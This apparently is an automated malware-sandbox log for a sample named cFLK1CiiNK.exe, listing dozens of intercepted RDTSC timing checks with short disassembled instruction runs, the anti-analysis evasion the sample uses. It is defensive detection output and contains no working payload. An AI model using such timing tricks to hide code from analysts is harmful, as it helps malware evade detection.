                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D009DF second address: D009EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F612923D906h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D009EF second address: D009F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D014E6 second address: D014EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C5E0A4 second address: C5E0AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C5E0AF second address: C5E0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F612923D906h 0x0000000a popad 0x0000000b js 00007F612923D90Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D05811 second address: D05827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B717Eh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D059BD second address: D059C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D059C1 second address: D059C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D059C5 second address: D059CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D059CD second address: D059ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7189h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0E1F4 second address: D0E222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D912h 0x00000007 jmp 00007F612923D90Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0C573 second address: D0C593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0C593 second address: D0C597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0C843 second address: D0C849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0C849 second address: D0C85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE3F second address: D0CE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F61286B7176h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE4E second address: D0CE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE54 second address: D0CE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE5A second address: D0CE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE64 second address: D0CE84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c ja 00007F61286B7176h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0CE84 second address: D0CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F612923D90Ch 0x0000000d jmp 00007F612923D90Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0D14B second address: D0D154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0D154 second address: D0D15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F612923D906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0D15E second address: D0D162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0D162 second address: D0D178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D910h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0DCB2 second address: D0DCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F61286B7176h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0DF41 second address: D0DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D112BF second address: D112CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D112CC second address: D112D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D112D0 second address: D112E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F61286B7183h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1175B second address: D1175F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1175F second address: D11765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D16A69 second address: D16A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D16A6F second address: D16A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1E35E second address: D1E385 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F612923D906h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jno 00007F612923D912h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1E385 second address: D1E389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1E389 second address: D1E3B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F612923D906h 0x00000011 jnc 00007F612923D906h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EAD4 second address: D1EADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EADA second address: D1EADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EC28 second address: D1EC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EC30 second address: D1EC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EC34 second address: D1EC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F61286B7182h 0x00000013 jnc 00007F61286B7176h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EEE2 second address: D1EEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EEE8 second address: D1EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F1CC second address: D1F209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F612923D916h 0x0000000e js 00007F612923D906h 0x00000014 jmp 00007F612923D90Ah 0x00000019 jc 00007F612923D90Eh 0x0000001f push eax 0x00000020 pop eax 0x00000021 js 00007F612923D906h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F612923D90Eh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F209 second address: D1F224 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F61286B717Eh 0x00000008 pushad 0x00000009 jne 00007F61286B7176h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8DC second address: D1F8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8E1 second address: D1F8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F61286B7176h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8EB second address: D1F8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DED2 second address: D1DEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F61286B7176h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEDE second address: D1DEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEE3 second address: D1DEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61286B717Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEF2 second address: D1DF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F612923D906h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007F612923D92Ah 0x00000013 jnp 00007F612923D912h 0x00000019 jmp 00007F612923D90Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D25B21 second address: D25B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F61286B7176h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330CF second address: D330F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F612923D906h 0x0000000a popad 0x0000000b jp 00007F612923D912h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330F3 second address: D330F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330F7 second address: D33118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F612923D90Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D33118 second address: D33130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F61286B7176h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F61286B7176h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D33130 second address: D33134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32BC3 second address: D32BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D58 second address: D32D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D6F second address: D32D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F61286B7176h 0x0000000a jg 00007F61286B7176h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F61286B7189h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D9D second address: D32DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F612923D90Ch 0x0000000f jmp 00007F612923D918h 0x00000014 pushad 0x00000015 jmp 00007F612923D914h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D35840 second address: D35847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D3D839 second address: D3D866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D913h 0x00000009 jmp 00007F612923D915h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D49D74 second address: D49DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B7180h 0x00000009 pushad 0x0000000a jbe 00007F61286B718Dh 0x00000010 jmp 00007F61286B7185h 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 jo 00007F61286B7176h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504C3 second address: D504D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F612923D906h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F612923D906h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504D7 second address: D504EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F61286B717Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504EF second address: D504F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504F3 second address: D504F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D501D9 second address: D5021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F612923D911h 0x00000008 jmp 00007F612923D90Fh 0x0000000d jmp 00007F612923D918h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D54A4B second address: D54A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F61286B7176h 0x0000000c popad 0x0000000d jl 00007F61286B7182h 0x00000013 jng 00007F61286B7176h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D54A66 second address: D54A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jo 00007F612923D906h 0x0000000d jmp 00007F612923D90Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F612923D914h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D6F85B second address: D6F876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F61286B717Dh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71892 second address: D718A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Fh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718A6 second address: D718AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718AD second address: D718E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F612923D912h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F612923D916h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718E8 second address: D718F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71575 second address: D71579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71579 second address: D71583 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D877EE second address: D8780E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F612923D906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F612923D910h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8780E second address: D87822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8679F second address: D867CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F612923D90Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F612923D914h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D867CC second address: D867D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D867D0 second address: D867F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F612923D90Bh 0x00000014 jnc 00007F612923D906h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D870A4 second address: D870C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F61286B7176h 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F61286B7176h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F61286B7176h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D87224 second address: D87230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F612923D906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874C5 second address: D874CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874CC second address: D874D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874D2 second address: D874D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874D8 second address: D87503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F612923D90Ch 0x0000000c jmp 00007F612923D918h 0x00000011 rdtsc
